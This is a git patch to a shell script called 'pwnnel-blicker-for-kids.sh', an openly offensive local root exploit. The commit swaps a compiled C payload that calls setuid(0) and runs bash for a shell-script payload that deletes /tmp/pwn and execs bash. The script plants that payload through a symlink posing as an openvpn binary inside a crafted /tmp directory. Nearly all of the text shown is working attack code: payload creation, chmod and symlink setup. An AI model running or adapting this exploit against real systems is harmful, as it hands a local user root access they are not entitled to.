From 1850b499900a3a573e6bc27224becaa8588be8dd Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sat, 11 Aug 2012 18:27:17 +0200
Subject: It already drops privs.

---
 pwnnel-blicker-for-kids.sh | 22 +++++++---------------
 1 file changed, 7 insertions(+), 15 deletions(-)

diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh
index 9eb2c73..b001529 100755
--- a/pwnnel-blicker-for-kids.sh
+++ b/pwnnel-blicker-for-kids.sh
@@ -17,22 +17,14 @@ echo "[+] Making vulnerable directory."
 mkdir -pv /tmp/pwn/openvpn/openvpn-0
 
 echo "[+] Preparing payload."
-cat > /tmp/pwn/root.c <<_EOF
-#include <unistd.h>
-#include <sys/stat.h>
-#include <stdio.h>
-
-int main()
-{
-	printf("[+] Cleaning up.\n");
-	system("rm -rfv /tmp/pwn");
-	printf("[+] Getting root.\n");
-	setuid(0);
-	setgid(0);
-	execl("/bin/bash", "bash", NULL);
-}
+cat > /tmp/pwn/root <<_EOF
+#!/bin/sh
+echo "[+] Cleaning up."
+rm -rfv /tmp/pwn
+echo "[+] Getting root."
+exec bash
 _EOF
-gcc -o /tmp/pwn/root /tmp/pwn/root.c
+chmod +x /tmp/pwn/root
 
 echo "[+] Creating symlinks."
 ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
-- 
cgit v1.2.3-59-g8ed1b